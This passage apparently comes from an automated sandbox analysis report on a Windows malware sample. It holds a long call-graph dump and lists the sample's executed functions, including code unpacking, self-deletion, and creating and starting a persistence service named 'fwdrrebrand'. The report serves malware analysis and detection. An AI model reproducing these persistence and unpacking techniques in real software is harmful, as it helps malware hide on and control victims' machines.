calls 2 library calls 43696->43722 43718 447f97 43697->43718 43700 448708 43723 44818f 7 API calls ctype 43700->43723 43702 448717 43724 44794f 7 API calls ctype 43702->43724 43704 44871e 43725 44818f 7 API calls ctype 43704->43725 43706 44872f 43726 44794f 7 API calls ctype 43706->43726 43708 448736 43709 448810 43708->43709 43710 44818f 7 API calls ctype 43708->43710 43711 44880e 43708->43711 43714 44794f 7 API calls ctype 43708->43714 43727 449e18 105 API calls 4 library calls 43708->43727 43728 448268 70 API calls 3 library calls 43708->43728 43709->43711 43713 447f97 _Fputc 105 API calls 43709->43713 43710->43708 43729 402090 69 API calls 2 library calls 43711->43729 43713->43711 43714->43708 43717->43643 43730 449aac 43718->43730 43720 447fa9 43720->43694 43722->43700 43723->43702 43724->43704 43725->43706 43726->43708 43727->43708 43728->43708 43729->43711 43731 449ab8 _setvbuf 43730->43731 43732 449aeb 43731->43732 43733 449acb 43731->43733 43749 440114 43732->43749 43776 431d3e 69 API calls __getptd_noexit 43733->43776 43737 449ad0 43777 4367e9 7 API calls 2 library calls 43737->43777 43740 449b7c 43786 449bb0 LeaveCriticalSection LeaveCriticalSection _ungetc 43740->43786 43741 449b6b 43741->43740 43755 43681f 43741->43755 43744 449ae0 _setvbuf 43744->43720 43746 449b5b 43785 4367e9 7 API calls 2 library calls 43746->43785 43750 440126 43749->43750 43751 440148 EnterCriticalSection 43749->43751 43750->43751 43753 44012e 43750->43753 43752 44013e 43751->43752 43752->43741 43778 4401f2 43752->43778 43754 43a0bf __lock 69 API calls 43753->43754 43754->43752 43756 4401f2 __fileno 69 API calls 43755->43756 43757 43682f 43756->43757 43758 436851 43757->43758 43759 43683a 43757->43759 43761 436855 43758->43761 43769 436862 __flsbuf 43758->43769 43790 431d3e 69 API calls __getptd_noexit 43759->43790 43791 431d3e 69 API calls __getptd_noexit 43761->43791 43763 4368c3 43764 436952 43763->43764 43765 4368d2 43763->43765 43795 43feb4 103 API calls 5 library calls 43764->43795 43767 4368e9 43765->43767 43772 436906 43765->43772 43793 43feb4 103 API calls 5 library calls 43767->43793 43769->43763 43771 43683f 43769->43771 43773 4368b8 43769->43773 43792 43ffd9 69 API calls __mbspbrk_l 43769->43792 43771->43740 43772->43771 43794 43f668 73 API calls 6 library calls 43772->43794 43773->43763 43787 43ff90 43773->43787 43776->43737 43779 440201 43778->43779 43783 440216 43778->43783 43802 431d3e 69 API calls __getptd_noexit 43779->43802 43781 440206 43803 4367e9 7 API calls 2 library calls 43781->43803 43783->43741 43784 431d3e 69 API calls __getptd_noexit 43783->43784 43784->43746 43786->43744 43796 438191 43787->43796 43790->43771 43791->43771 43792->43773 43793->43771 43794->43771 43795->43771 43799 43819a 43796->43799 43797 43108c _malloc 68 API calls 43797->43799 43798 4381d0 43798->43763 43799->43797 43799->43798 43800 4381b1 Sleep 43799->43800 43801 4381c6 43800->43801 43801->43798 43801->43799 43802->43781 43804->43651 43805->43657 43806->43657 43808 40358c 43807->43808 43811 403483 43807->43811 43808->43657 43809 403130 72 API calls 43809->43811 43810 403340 108 API calls 43810->43811 43811->43808 43811->43809 43811->43810 43813 402d20 70 API calls 3 library calls 43811->43813 43813->43811 43814->43669 43816 438848 43815->43816 43819 438635 43816->43819 43831 430d81 43819->43831 43821 43865c 43839 431d3e 69 API calls __getptd_noexit 43821->43839 43824 438661 43840 4367e9 7 API calls 2 library calls 43824->43840 43827 438698 43829 4386bc wcstoxl 43827->43829 43841 440664 80 API calls 2 library calls 43827->43841 43830 40389f 43829->43830 43842 431d3e 69 API calls __getptd_noexit 43829->43842 43830->43622 43832 430d94 43831->43832 43838 430de1 43831->43838 43843 436178 69 API calls 2 library calls 43832->43843 43834 430d99 43835 430dc1 43834->43835 43844 439212 77 API calls 5 library calls 43834->43844 43835->43838 43845 438a80 71 API calls 6 library calls 43835->43845 43838->43821 43838->43827 43839->43824 43841->43827 43842->43830 43843->43834 43844->43835 43845->43838 43846 414c85 43847 414c93 43846->43847 43850 414b9c 43847->43850 43851 414c59 43850->43851 43855 414bd2 43850->43855 43852 414bd3 RegOpenKeyExA 43852->43855 43853 414bf0 RegQueryValueExA 43853->43855 43854 414c42 RegCloseKey 43854->43855 43855->43851 43855->43852 43855->43853 43855->43854 43856 435ee6 43857 435e74 __encode_pointer 7 API calls 43856->43857 43858 435eed 43857->43858 43859 44cfc1 43864 42041b 43859->43864 43861 44cfcb 43862 430b0e __cinit 76 API calls 43861->43862 43863 44cfd5 43862->43863 43869 4203bf 8 API calls 43864->43869 43866 420427 43870 420379 7 API calls 43866->43870 43868 420433 LoadCursorA LoadCursorA 43868->43861 43869->43866 43870->43868 43871 410b6d 43898 431ace 43871->43898 43873 410b79 GetPropA 43874 410ba3 43873->43874 43875 410c46 43873->43875 43876 410c25 43874->43876 43877 410ba8 43874->43877 43878 40ee3c ~_Task_impl 113 API calls 43875->43878 43879 40ee3c ~_Task_impl 113 API calls 43876->43879 43880 410bad 43877->43880 43881 410bfe SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 43877->43881 43882 410c4e 43878->43882 43883 410c2b 43879->43883 43884 410c64 CallWindowProcA 43880->43884 43885 410bb8 43880->43885 43881->43884 43886 40ee3c ~_Task_impl 113 API calls 43882->43886 43901 410af5 121 API calls 2 library calls 43883->43901 43890 410bf3 std::_Locinfo::~_Locinfo 43884->43890 43888 40ee3c ~_Task_impl 113 API calls 43885->43888 43889 410c56 43886->43889 43892 410bbe 43888->43892 43902 410a7d 120 API calls 43889->43902 43891 410c3d 43894 410c60 43891->43894 43899 40d7c1 GetWindowRect GetWindowLongA 43892->43899 43894->43884 43894->43890 43896 410bce CallWindowProcA 43900 40f5b7 148 API calls ctype 43896->43900 43898->43873 43899->43896 43900->43890 43901->43891 43902->43894 43903 43156e 43942 431818 43903->43942 43905 43157a GetStartupInfoA 43906 43159d 43905->43906 43943 43abb6 HeapCreate 43906->43943 43909 4315ed 43945 43632f GetModuleHandleW 43909->43945 43913 4315fe __RTC_Initialize 43979 43b789 43913->43979 43916 43160c 43917 431618 GetCommandLineA 43916->43917 44069 43395f 69 API calls 3 library calls 43916->44069 43994 43b652 43917->43994 43920 431617 43920->43917 43924 43163d 44030 43b31f 43924->44030 43928 43164e 44045 433a1e 43928->44045 43931 431655 43932 431660 43931->43932 44072 43395f 69 API calls 3 library calls 43931->44072 44051 43b2c0 43932->44051 43938 43168f 44074 433bfb 69 API calls _doexit 43938->44074 43941 431694 _setvbuf 43942->43905 43944 4315e1 43943->43944 43944->43909 44067 431545 69 API calls 3 library calls 43944->44067 43946 436343 43945->43946 43947 43634a 43945->43947 44075 43392f Sleep GetModuleHandleW 43946->44075 43949 4364b2 43947->43949 43950 436354 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 43947->43950 44085 435fdb 72 API calls 2 library calls 43949->44085 43953 43639d TlsAlloc 43950->43953 43952 436349 43952->43947 43955 4315f3 43953->43955 43956 4363eb TlsSetValue 43953->43956 43955->43913 44068 431545 69 API calls 3 library calls 43955->44068 43956->43955 43957 4363fc 43956->43957 44076 433c19 7 API calls 4 library calls 43957->44076 43959 436401 43960 435e74 __encode_pointer 7 API calls 43959->43960 43961 43640c 43960->43961 43962 435e74 __encode_pointer 7 API calls 43961->43962 43963 43641c 43962->43963 43964 435e74 __encode_pointer 7 API calls 43963->43964 43965 43642c 43964->43965 43966 435e74 __encode_pointer 7 API calls 43965->43966 43967 43643c 43966->43967 44077 439f43 InitializeCriticalSectionAndSpinCount ___lock_fhandle 43967->44077 43969 436449 43969->43949 43970 435eef __decode_pointer 7 API calls 43969->43970 43971 43645d 43970->43971 43971->43949 44078 4381d6 43971->44078 43974 435eef __decode_pointer 7 API calls 43975 436490 43974->43975 43975->43949 43976 436497 43975->43976 44084 436018 69 API calls 5 library calls 43976->44084 43978 43649f GetCurrentThreadId 43978->43955 44104 431818 43979->44104 43981 43b795 GetStartupInfoA 43982 4381d6 __calloc_crt 69 API calls 43981->43982 43983 43b7b6 43982->43983 43984 43b9d4 _setvbuf 43983->43984 43987 4381d6 __calloc_crt 69 API calls 43983->43987 43989 43b91b 43983->43989 43990 43b89e 43983->43990 43984->43916 43985 43b951 GetStdHandle 43985->43989 43986 43b9b6 SetHandleCount 43986->43984 43987->43983 43988 43b963 GetFileType 43988->43989 43989->43984 43989->43985 43989->43986 43989->43988 44106 43c56f InitializeCriticalSectionAndSpinCount _setvbuf 43989->44106 43990->43984 43990->43989 43991 43b8c7 GetFileType 43990->43991 44105 43c56f InitializeCriticalSectionAndSpinCount _setvbuf 43990->44105 43991->43990 43995 43b670 GetEnvironmentStringsW 43994->43995 43996 43b68f 43994->43996 43997 43b684 GetLastError 43995->43997 43998 43b678 43995->43998 43996->43998 43999 43b728 43996->43999 43997->43996 44000 43b6ab GetEnvironmentStringsW 43998->44000 44001 43b6ba WideCharToMultiByte 43998->44001 44002 43b731 GetEnvironmentStrings 43999->44002 44003 431628 43999->44003 44000->44001 44000->44003 44006 43b6ee 44001->44006 44007 43b71d FreeEnvironmentStringsW 44001->44007 44002->44003 44004 43b741 44002->44004 44019 43b597 44003->44019 44008 438191 __malloc_crt 69 API calls 44004->44008 44009 438191 __malloc_crt 69 API calls 44006->44009 44007->44003 44010 43b75b 44008->44010 44011 43b6f4 44009->44011 44012 43b762 FreeEnvironmentStringsA 44010->44012 44013 43b76e _setlocale 44010->44013 44011->44007 44014 43b6fc WideCharToMultiByte 44011->44014 44012->44003 44017 43b778 FreeEnvironmentStringsA 44013->44017 44015 43b716 44014->44015 44016 43b70e 44014->44016 44015->44007 44107 4316f6 69 API calls 7 library calls 44016->44107 44017->44003 44020 43b5b1 GetModuleFileNameA 44019->44020 44021 43b5ac 44019->44021 44023 43b5d8 44020->44023 44114 438f1f 113 API calls __setmbcp 44021->44114 44108 43b3fd 44023->44108 44025 431632 44025->43924 44070 43395f 69 API calls 3 library calls 44025->44070 44027 438191 __malloc_crt 69 API calls 44028 43b61a 44027->44028 44028->44025 44029 43b3fd _parse_cmdline 79 API calls 44028->44029 44029->44025 44031 43b328 44030->44031 44032 43b32d _strlen 44030->44032 44116 438f1f 113 API calls __setmbcp 44031->44116 44034 431643 44032->44034 44035 4381d6 __calloc_crt 69 API calls 44032->44035 44034->43928 44071 43395f 69 API calls 3 library calls 44034->44071 44040 43b362 _strlen 44035->44040 44036 43b3c0 44119 4316f6 69 API calls 7 library calls 44036->44119 44038 4381d6 __calloc_crt 69 API calls 44038->44040 44039 43b3e6 44120 4316f6 69 API calls 7 library calls 44039->44120 44040->44034 44040->44036 44040->44038 44040->44039 44043 43b3a7 44040->44043 44117 433c67 69 API calls __mbspbrk_l 44040->44117 44043->44040 44118 4366c1 10 API calls 3 library calls 44043->44118 44046 433a2c __IsNonwritableInCurrentImage 44045->44046 44121 43c31e 44046->44121 44048 433a4a __initterm_e 44049 430b0e __cinit 76 API calls 44048->44049 44050 433a69 __IsNonwritableInCurrentImage __initterm 44048->44050 44049->44050 44050->43931 44052 43b2ce 44051->44052 44054 43b2d3 44051->44054 44125 438f1f 113 API calls __setmbcp 44052->44125 44056 431666 44054->44056 44126 434a02 79 API calls x_ismbbtype_l 44054->44126 44057 4498ee 44056->44057 44058 44992f 44057->44058 44127 415ad9 44058->44127 44061 41f363 ctype 112 API calls 44062 449946 44061->44062 44130 42ffa2 SetErrorMode SetErrorMode 44062->44130 44065 431681 44065->43938 44073 433bcf 69 API calls _doexit 44065->44073 44067->43909 44068->43913 44069->43920 44070->43924 44071->43928 44072->43932 44073->43938 44074->43941 44075->43952 44076->43959 44077->43969 44080 4381df 44078->44080 44081 436476 44080->44081 44082 4381fd Sleep 44080->44082 44086 43db85 44080->44086 44081->43949 44081->43974 44083 438212 44082->44083 44083->44080 44083->44081 44084->43978 44085->43955 44087 43db91 _setvbuf 44086->44087 44088 43dba9 44087->44088 44091 43dbc8 _memset 44087->44091 44099 431d3e 69 API calls __getptd_noexit 44088->44099 44090 43dbae 44100 4367e9 7 API calls 2 library calls 44090->44100 44093 43dc3a RtlAllocateHeap 44091->44093 44095 43a0bf __lock 68 API calls 44091->44095 44096 43dbbe _setvbuf 44091->44096 44101 43a8d1 5 API calls 2 library calls 44091->44101 44102 43dc81 LeaveCriticalSection _doexit 44091->44102 44103 43add9 7 API calls __decode_pointer 44091->44103 44093->44091 44095->44091 44096->44080 44099->44090 44101->44091 44102->44091 44103->44091 44104->43981 44105->43990 44106->43989 44107->44015 44110 43b41c 44108->44110 44112 43b489 44110->44112 44115 434a02 79 API calls x_ismbbtype_l 44110->44115 44111 43b587 44111->44025 44111->44027 44112->44111 44113 434a02 79 API calls __wincmdln 44112->44113 44113->44112 44114->44020 44115->44110 44116->44032 44117->44040 44118->44043 44119->44034 44120->44034 44122 43c324 44121->44122 44123 435e74 __encode_pointer 7 API calls 44122->44123 44124 43c33c 44122->44124 44123->44122 44124->44048 44125->44054 44126->44054 44128 41f396 ~_Task_impl 112 API calls 44127->44128 44129 415ade 44128->44129 44129->44061 44131 41f363 ctype 112 API calls 44130->44131 44132 42ffbf 44131->44132 44146 41eb0a 44132->44146 44135 41f363 ctype 112 API calls 44136 42ffd4 44135->44136 44137 42fff1 44136->44137 44154 42fe1c 44136->44154 44139 41f363 ctype 112 API calls 44137->44139 44140 42fff6 44139->44140 44141 430002 GetModuleHandleA 44140->44141 44177 4161f7 44140->44177 44143 430022 44141->44143 44144 430011 GetProcAddress 44141->44144 44145 42eb6a 121 API calls 2 library calls 44143->44145 44144->44143 44145->44065 44183 41ea0e 44146->44183 44149 41eb50 44151 41eb57 SetLastError 44149->44151 44153 41eb64 44149->44153 44150 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 44152 41ec04 44150->44152 44151->44153 44152->44135 44153->44150 44155 41f363 ctype 112 API calls 44154->44155 44156 42fe3b GetModuleFileNameA 44155->44156 44157 42fe63 44156->44157 44158 42fe6c PathFindExtensionA 44157->44158 44190 42282a RaiseException __CxxThrowException@8 44157->44190 44160 42fe83 44158->44160 44161 42fe88 44158->44161 44191 42282a RaiseException __CxxThrowException@8 44160->44191 44192 42fddc 83 API calls 2 library calls 44161->44192 44164 42fea5 44165 42feae 44164->44165 44193 42282a RaiseException __CxxThrowException@8 44164->44193 44175 42fec0 ctype 44165->44175 44194 433ccf 69 API calls 4 library calls 44165->44194 44169 42ff93 44170 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 44169->44170 44173 42ffa0 44170->44173 44173->44137 44175->44169 44176 433ccf 69 API calls __strdup 44175->44176 44195 4063fe RaiseException __CxxThrowException@8 44175->44195 44196 41b239 117 API calls 2 library calls 44175->44196 44197 414fee 69 API calls 2 library calls 44175->44197 44198 4317a1 69 API calls __mbspbrk_l 44175->44198 44176->44175 44178 41f363 ctype 112 API calls 44177->44178 44179 4161fc 44178->44179 44180 416224 44179->44180 44199 41edab 44179->44199 44180->44141 44184 41ea17 GetModuleHandleA 44183->44184 44185 41ea7b GetModuleFileNameW 44183->44185 44186 41ea30 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 44184->44186 44187 41ea2b 44184->44187 44185->44149 44185->44153 44186->44185 44189 406436 2 API calls 4 library calls 44187->44189 44189->44186 44190->44158 44191->44161 44192->44164 44193->44165 44194->44175 44196->44175 44197->44175 44198->44175 44200 420aec ctype 106 API calls 44199->44200 44201 416208 GetCurrentThreadId SetWindowsHookExA 44200->44201 44201->44180 44202 22f0000 44204 22f0005 44202->44204 44207 22f002d 44204->44207 44227 22f0467 GetPEB 44207->44227 44210 22f0467 GetPEB 44211 22f0053 44210->44211 44212 22f0467 GetPEB 44211->44212 44213 22f0061 44212->44213 44214 22f0467 GetPEB 44213->44214 44215 22f006d 44214->44215 44216 22f0467 GetPEB 44215->44216 44217 22f007b 44216->44217 44218 22f0467 GetPEB 44217->44218 44221 22f0089 44218->44221 44219 22f00e6 GetNativeSystemInfo 44220 22f0109 VirtualAlloc 44219->44220 44225 22f0029 44219->44225 44224 22f0135 44220->44224 44221->44219 44221->44225 44222 22f03c3 44229 23ecd97 44222->44229 44223 22f0384 VirtualProtect 44223->44224 44223->44225 44224->44222 44224->44223 44228 22f0045 44227->44228 44228->44210 44246 23eaec9 44229->44246 44231 23ecda8 44249 23ebe17 44231->44249 44233 23ecdad GetModuleFileNameW 44234 23ecdcd 44233->44234 44252 23e1a52 44234->44252 44236 23ecdde 44237 23ecdfa GetCommandLineW lstrlenW lstrlenW 44236->44237 44238 23ece3e 44237->44238 44239 23ece1f lstrcmpiW 44238->44239 44240 23ece45 44238->44240 44239->44238 44241 23ece31 44239->44241 44266 23e1cc2 CreateProcessW CloseHandle CloseHandle 44240->44266 44256 23eac49 GetTickCount 44241->44256 44244 23ece5b ExitProcess 44267 23e12cd GetPEB 44246->44267 44248 23ebe03 44248->44231 44250 23e12cd GetPEB 44249->44250 44251 23ecd83 44250->44251 44251->44233 44253 23e1a70 44252->44253 44269 23e14f2 GetProcessHeap RtlAllocateHeap 44253->44269 44255 23e1a84 44255->44236 44255->44255 44270 23ea88e GetWindowsDirectoryW 44256->44270 44261 23eaca0 ExitProcess 44262 23eac70 WaitForSingleObject 44263 23eac8a 44262->44263 44263->44261 44288 23eab8a 44263->44288 44265 23eac8f WaitForSingleObject 44265->44263 44266->44244 44268 23e12e2 44267->44268 44268->44248 44269->44255 44271 23ea8ec 44270->44271 44273 23ea8ad GetVolumeInformationW 44270->44273 44274 23ea9fc 44271->44274 44273->44271 44317 23ea8f0 44274->44317 44276 23eaa04 44277 23eaa08 WaitForSingleObject 44276->44277 44278 23eaa78 44276->44278 44279 23eaa1f 44277->44279 44278->44261 44278->44262 44279->44278 44321 23ea949 44279->44321 44281 23eaa28 44282 23eaa60 ReleaseMutex CloseHandle 44281->44282 44325 23ea9a2 GetProcessHeap RtlAllocateHeap CreateEventW 44281->44325 44282->44278 44284 23eaa31 44284->44282 44285 23eaa35 SignalObjectAndWait 44284->44285 44286 23eaa4e 44285->44286 44287 23eaa52 ResetEvent 44285->44287 44286->44282 44286->44287 44287->44282 44289 23eac0a 44288->44289 44290 23eab95 44288->44290 44354 23e632a GetProcessHeap RtlAllocateHeap LoadLibraryW 44289->44354 44292 23eab98 44290->44292 44293 23eabc4 44290->44293 44296 23eab9b 44292->44296 44297 23eabb3 44292->44297 44348 23e8206 GetProcessHeap RtlAllocateHeap LoadLibraryW 44293->44348 44295 23eac0f 44355 23e6ece GetProcessHeap RtlAllocateHeap LoadLibraryW 44295->44355 44300 23eaba2 SetEvent 44296->44300 44309 23eac3b 44296->44309 44347 23eaa7d 66 API calls 44297->44347 44298 23eabc9 44349 23e8d0a GetProcessHeap RtlAllocateHeap LoadLibraryW 44298->44349 44300->44309 44303 23eac14 44326 23ed652 44303->44326 44304 23eabc2 44304->44265 44305 23eabce 44350 23e9d18 GetProcessHeap RtlAllocateHeap LoadLibraryW 44305->44350 44308 23eabd3 44351 23ea312 GetProcessHeap RtlAllocateHeap LoadLibraryW 44308->44351 44309->44265 44311 23eac27 GetTickCount 44311->44265 44312 23eabd8 44352 23ea58f GetProcessHeap RtlAllocateHeap LoadLibraryW 44312->44352 44314 23eabdd 44353 23e60c5 9 API calls 44314->44353 44316 23eabe4 44316->44309 44316->44311 44318 23e1a52 2 API calls 44317->44318 44319 23ea909 44318->44319 44320 23ea928 CreateMutexW 44319->44320 44320->44276 44322 23e1a52 2 API calls 44321->44322 44323 23ea962 44322->44323 44324 23ea981 CreateMutexW 44323->44324 44324->44281 44325->44284 44356 23ece90 OpenSCManagerW 44326->44356 44330 23ed667 44362 23ed0ea CreateFileW 44330->44362 44334 23ed67b 44377 23ed013 44334->44377 44336 23ed680 lstrcmpiW 44337 23ed697 44336->44337 44338 23ed695 44336->44338 44387 23ed35f 44337->44387 44338->44316 44341 23ed6ac 44411 23e1cc2 CreateProcessW CloseHandle CloseHandle 44341->44411 44342 23ed6a5 44394 23ed4c5 OpenSCManagerW 44342->44394 44345 23ed6aa 44345->44316 44346 23ed6b8 44346->44345 44347->44304 44348->44298 44349->44305 44350->44308 44351->44312 44352->44314 44353->44316 44354->44295 44355->44303 44357 23eceb4 44356->44357 44358 23ecea3 CloseServiceHandle 44356->44358 44359 23ece6e 44357->44359 44358->44357 44412 23e1503 44359->44412 44361 23ece83 GetModuleFileNameW 44361->44330 44363 23ed10c CreateFileMappingW 44362->44363 44364 23ed160 44362->44364 44365 23ed158 CloseHandle 44363->44365 44366 23ed120 MapViewOfFile 44363->44366 44370 23ed163 GetComputerNameW 44364->44370 44365->44364 44367 23ed132 GetFileSize 44366->44367 44368 23ed151 FindCloseChangeNotification 44366->44368 44369 23ed145 UnmapViewOfFile 44367->44369 44368->44365 44369->44368 44371 23ed183 44370->44371 44375 23ed1ba 44370->44375 44372 23e19ab 2 API calls 44371->44372 44374 23ed18e WideCharToMultiByte 44372->44374 44374->44375 44414 23e19ab 44375->44414 44376 23ed1fd 44376->44334 44378 23e1a52 2 API calls 44377->44378 44379 23ed030 44378->44379 44419 23eceb5 lstrlenW 44379->44419 44381 23ed05e 44384 23e1a52 2 API calls 44381->44384 44382 23ed03f 44382->44381 44383 23e1a52 2 API calls 44382->44383 44383->44381 44385 23ed0ad 44384->44385 44386 23ed0d6 DeleteFileW 44385->44386 44386->44336 44421 23e1000 44387->44421 44389 23ed371 44392 23ed399 GetTempPathW GetTempFileNameW 44389->44392 44393 23ed3c4 44389->44393 44391 23ed3ed 44391->44341 44391->44342 44392->44393 44427 23e10dc 44393->44427 44395 23ed4ec 44394->44395 44396 23ed5a0 44394->44396 44397 23e1a52 2 API calls 44395->44397 44396->44345 44398 23ed4fc 44397->44398 44399 23ed520 CreateServiceW 44398->44399 44400 23ed559 44399->44400 44401 23ed547 OpenServiceW 44399->44401 44431 23ed229 EnumServicesStatusExW 44400->44431 44402 23ed57b 44401->44402 44404 23ed57f StartServiceW CloseServiceHandle 44402->44404 44405 23ed591 44402->44405 44404->44405 44450 23ed3f5 GetModuleFileNameW lstrlenW OpenServiceW DeleteService CloseServiceHandle 44405->44450 44408 23ed567 ChangeServiceConfig2W 44449 23e1532 GetProcessHeap HeapFree 44408->44449 44409 23ed598 CloseServiceHandle 44409->44396 44411->44346 44413 23e1509 44412->44413 44413->44361 44415 23e19cb 44414->44415 44418 23e14f2 GetProcessHeap RtlAllocateHeap 44415->44418 44417 23e19de 44417->44376 44417->44417 44418->44417 44420 23eced9 44419->44420 44420->44382 44422 23e101b 44421->44422 44423 23e1071 44422->44423 44424 23e1040 GetFileAttributesW 44422->44424 44423->44389 44424->44422 44425 23e1052 CreateDirectoryW 44424->44425 44425->44422 44426 23e1064 GetLastError 44425->44426 44426->44422 44426->44423 44428 23e1a52 2 API calls 44427->44428 44429 23e10f5 44428->44429 44430 23e1119 DeleteFileW 44429->44430 44430->44391 44432 23ed25d GetLastError 44431->44432 44433 23ed34d 44431->44433 44432->44433 44434 23ed26e 44432->44434 44433->44402 44433->44408 44451 23e14f2 GetProcessHeap RtlAllocateHeap 44434->44451 44436 23ed277 44436->44433 44437 23ed284 EnumServicesStatusExW 44436->44437 44438 23ed2a8 GetTickCount 44437->44438 44439 23ed340 44437->44439 44440 23ed2c7 44438->44440 44454 23e1532 GetProcessHeap HeapFree 44439->44454 44440->44439 44442 23ed2cb OpenServiceW 44440->44442 44444 23ed32d CloseServiceHandle 44440->44444 44447 23ed30d QueryServiceConfig2W 44440->44447 44452 23e14f2 GetProcessHeap RtlAllocateHeap 44440->44452 44453 23e1532 GetProcessHeap HeapFree 44440->44453 44442->44440 44443 23ed2df QueryServiceConfig2W 44442->44443 44443->44444 44445 23ed2f4 GetLastError 44443->44445 44444->44440 44445->44440 44445->44444 44447->44440 44447->44444 44449->44402 44450->44409 44451->44436 44452->44440 44453->44444 44454->44433 44455 427acd 44456 427ad9 __EH_prolog3 44455->44456 44457 4014c0 ctype 82 API calls 44456->44457 44458 427ae3 44457->44458 44459 4014c0 ctype 82 API calls 44458->44459 44460 427aef 44459->44460 44461 41f363 ctype 112 API calls 44460->44461 44462 427af8 44461->44462 44463 4292e7 84 API calls 44462->44463 44468 427b05 ctype 44463->44468 44464 408692 ctype 2 API calls 44464->44468 44465 405562 82 API calls 44465->44468 44466 427fb7 ctype std::_Locinfo::~_Locinfo 44467 4014c0 82 API calls ctype 44467->44468 44468->44464 44468->44465 44468->44466 44468->44467 44469 41f363 ctype 112 API calls 44468->44469 44471 427bad DestroyCursor 44468->44471 44474 405ec1 82 API calls 44468->44474 44475 427206 124 API calls 44468->44475 44477 40a356 82 API calls 44468->44477 44479 420018 44468->44479 44489 405e21 82 API calls 2 library calls 44468->44489 44490 4056c2 82 API calls ctype 44468->44490 44491 409f00 82 API calls ctype 44468->44491 44470 427b88 ExtractIconA 44469->44470 44470->44468 44471->44468 44474->44468 44475->44468 44477->44468 44480 420024 __EH_prolog3 44479->44480 44481 406039 118 API calls 44480->44481 44482 42002f 44481->44482 44483 42007a RegQueryValueA 44482->44483 44492 4168ab 82 API calls 2 library calls 44482->44492 44484 420099 ctype std::_Locinfo::~_Locinfo 44483->44484 44484->44468 44486 420058 44493 4056c2 82 API calls ctype 44486->44493 44488 420068 ctype 44488->44483 44489->44468 44490->44468 44491->44468 44492->44486 44493->44488

                  Executed Functions

                  Function 023ED4C5, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84serviceCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 023ED4DC
                  • CreateServiceW.ADVAPI32(00000000,fwdrrebrand,fwdrrebrand,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 023ED53B
                  • OpenServiceW.ADVAPI32(00000000,fwdrrebrand,00000010), ref: 023ED54F
                  • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,?), ref: 023ED56D
                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 023ED582
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 023ED58B
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 023ED599
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandleOpen$ChangeConfig2CreateManagerStart
                  • String ID: C:\Windows\SysWOW64\fwdrrebrand.exe$fwdrrebrand
                  • API String ID: 643643595-3855578920
                  • Opcode ID: 6f2acf248d1c994a0144a333f49c7072a66baa076bfae328e4ac452df8ec84d0
                  • Instruction ID: ca0e940bb6fd3abaad8d40c9ea3dd7187d6fd3ca6311d367dd8f154af76291e1
                  • Opcode Fuzzy Hash: 6f2acf248d1c994a0144a333f49c7072a66baa076bfae328e4ac452df8ec84d0
                  • Instruction Fuzzy Hash: 3C2108B5A41328B7DF306778AC48FAF366DAB84710F000514FA07E72C6DBB09D1886A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ED229, Relevance: 13.6, APIs: 9, Instructions: 120serviceCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 450 23ed229-23ed257 EnumServicesStatusExW 451 23ed25d-23ed268 GetLastError 450->451 452 23ed357-23ed35e 450->452 451->452 453 23ed26e-23ed27e call 23e14f2 451->453 456 23ed356 453->456 457 23ed284-23ed2a2 EnumServicesStatusExW 453->457 456->452 458 23ed2a8-23ed2c4 GetTickCount 457->458 459 23ed342 457->459 461 23ed2c7-23ed2c9 458->461 460 23ed345-23ed34f call 23e1532 459->460 460->456 467 23ed351-23ed354 460->467 461->460 463 23ed2cb-23ed2dd OpenServiceW 461->463 465 23ed2df-23ed2f2 QueryServiceConfig2W 463->465 466 23ed336-23ed33e 463->466 468 23ed32d-23ed330 CloseServiceHandle 465->468 469 23ed2f4-23ed2fd GetLastError 465->469 466->461 470 23ed340 466->470 467->456 468->466 469->468 471 23ed2ff-23ed30b call 23e14f2 469->471 470->460 471->468 474 23ed30d-23ed324 QueryServiceConfig2W 471->474 474->468 475 23ed326-23ed328 call 23e1532 474->475 475->468
                  APIs
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,023ED563,?,00000000,00000000,00000000,00000000), ref: 023ED24F
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,023ED563), ref: 023ED25D
                    • Part of subcall function 023E14F2: GetProcessHeap.KERNEL32(00000008,023EF000,023E1A84,?,?,?,?,?,?,?,023E10F5), ref: 023E14F5
                    • Part of subcall function 023E14F2: RtlAllocateHeap.NTDLL(00000000), ref: 023E14FC
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,023ED563,023ED563,?,00000000,00000000,00000000), ref: 023ED29A
                  • GetTickCount.KERNEL32 ref: 023ED2A8
                  • OpenServiceW.ADVAPI32(?,00000000,00000001,?,?,?,?,?,?,?,023ED563), ref: 023ED2D2
                  • QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,023ED563), ref: 023ED2EA
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,023ED563), ref: 023ED2F4
                  • QueryServiceConfig2W.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,023ED563), ref: 023ED31A
                    • Part of subcall function 023E1532: GetProcessHeap.KERNEL32(00000000,00000000,023E13F0), ref: 023E1535
                    • Part of subcall function 023E1532: HeapFree.KERNEL32(00000000), ref: 023E153C
